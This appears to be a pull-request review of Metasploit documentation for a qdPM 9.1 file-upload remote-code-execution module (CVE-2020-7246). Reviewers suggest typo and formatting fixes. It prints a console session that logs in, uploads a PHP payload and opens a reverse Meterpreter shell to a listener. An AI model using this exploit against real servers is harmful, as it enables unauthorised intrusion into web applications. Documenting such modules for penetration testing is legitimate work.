qdPM 9.1 - Authenticated Remote Code Execution (CVE-2020-7246) (#16673)
rapid7/metasploit-framework: documentation/modules/exploit/multi/http/qdpm_authenticated_rce.md

## Vulnerable Application

> This module exploits a arbitrary file upload vulnerability in the qdPM web-based project manager software, in its 9.1 version. When updating a user's profile (POST `myAccoutnt/update`), the user is allowed to upload a profile picture, which is stored in a known location under the web server root. The software fails to verify the picture input, allowing for the upload of any file, with any filename extension. This can be eploited by uploading a PHP script and invoking it by making a request to it. 

Reviewer: ```suggestion
This module exploits a arbitrary file upload vulnerability in the qdPM web-based project manager software, in its 9.1 version. When updating a user's profile (POST `myAccount/update`), the user is allowed to upload a profile picture, which is stored in a known location under the web server root. The software fails to verify the picture input, allowing for the upload of any file, with any filename extension. This can be exploited by uploading a PHP script and invoking it by making a request to it. 
```

## Scenarios

As it can be shown by the following scenarios, the exploit works reliably against a variety of targets. The exploit, however, might fail when a large payload (i.e. stageless meterpreter) is selected.
  
   
  **Attacking with a generic PHP payload, OS independed**

    ```
    [msf](Jobs:0 Agents:0) exploit(multi/http/qdpm_authenticated_rce) >> set target Generic\ (PHP\ Payload)
    target => Generic (PHP Payload)
    [msf](Jobs:0 Agents:0) exploit(multi/http/qdpm_authenticated_rce) >> set payload php/meterpreter/reverse_tcp
    payload => php/meterpreter/reverse_tcp
    [msf](Jobs:0 Agents:0) exploit(multi/http/qdpm_authenticated_rce) >> exploit

    [*] Started reverse TCP handler on 192.168.2.177:4444
    [*] Attempt to login with 'johndoe@localhost.com:easyone'
    [*] Uploading PHP payload (1123 bytes)...
    [*] Executing 'JGvak.php'
    [*] Sending stage (39927 bytes) to 192.168.2.177
    [!] Removing: 993379-JGvak.php
    [*] Meterpreter session 2 opened (192.168.2.177:4444 -> 192.168.2.177:43816) at 2022-06-14 10:03:46 +0200

    (Meterpreter 1)(/home/giacomo/qdPM/uploads/users) > getuid
    Server username: www-data
    ```

> 

Reviewer: Can we dedent these lines to be left-most aligned 👀
